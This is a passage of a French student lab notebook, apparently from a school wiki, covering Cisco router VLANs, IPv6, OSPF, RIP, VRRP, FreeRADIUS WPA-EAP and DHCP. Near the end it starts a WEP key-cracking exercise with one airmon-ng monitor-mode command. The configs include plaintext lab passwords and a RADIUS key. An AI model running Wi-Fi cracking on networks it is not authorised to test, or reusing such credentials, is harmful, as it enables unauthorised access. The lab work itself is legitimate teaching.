&amp;lt;pre&amp;gt; flash Cleartext-Password:=&amp;quot;reverse&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne de la E306 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''' : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;aaa authentication login eap_flash group radius_flash&lt;br /&gt;
radius-server host 193.48.57.165 auth-port 1812 acct-port 1813 key kadoc&lt;br /&gt;
aaa group server radius radius_flash&lt;br /&gt;
server 193.48.57.165 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_FLASH&lt;br /&gt;
vlan 6&lt;br /&gt;
authentication open eap eap_flash&lt;br /&gt;
authentication network-eap eap_flash&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 6 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_FLASH&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 6&lt;br /&gt;
bridge-group 6 subscriber-loop-control&lt;br /&gt;
bridge-group 6 spanning-disabled&lt;br /&gt;
bridge-group 6 block-unknown-source&lt;br /&gt;
no bridge-group 6 source-learning&lt;br /&gt;
no bridge-group 6 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.6&lt;br /&gt;
encapsulation dot1Q 6&lt;br /&gt;
bridge-group 6&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons maintenant configurer l'interface wlan0 de notre eeePc pour pouvoir se connecter à la borne. Comme nous n'avons pas encore de serveur DHCP, nous devons la configurer manuellement, en prenant une adresse dans notre VLAN :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.6&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.6.1&lt;br /&gt;
  wpa-ssid SSID_FLASH&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity flash&lt;br /&gt;
  wpa-password reverse&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons lancer notre serveur FreeRadius en mode debug via '''freeradius -X'''. &amp;lt;br /&amp;gt;&lt;br /&gt;
On arrive bien à détecter notre SSID (SSID_FLASH) via un smartphone, et nous arrivons à ping notre eeePc depuis la machine virtuelle .&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.6&lt;br /&gt;
PING 10.60.6.6 (10.60.6.6) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 9e séance====&lt;br /&gt;
=====Serveur DHCP=====&lt;br /&gt;
Nous avons installé le paquet '''isc-dhcp-server'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons modifié le fichier de configuration du serveur DHCP''' /etc/dhcp/dhcpd.conf''':&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;option domain-name &amp;quot;speedflash.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.165;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.6.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.6.10 10.60.6.40;&lt;br /&gt;
      option routers 10.60.6.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite modifié le fichier '''/etc/default/isc-dhcp-server''' pour y ajouter wlan0 comme interface à prendre en compte.&lt;br /&gt;
Nous avons redémarré le serveur en lançant service isc-dhcp-server restart.&amp;lt;br /&amp;gt;&lt;br /&gt;
En se connectant avec un smartphone en DHCP, nous arrivons à avoir une adresse IP, et nous arrivons à la pinger depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35882</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35882"/>
				<updated>2016-12-12T09:00:08Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Sécurisation Wifi par WPA-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
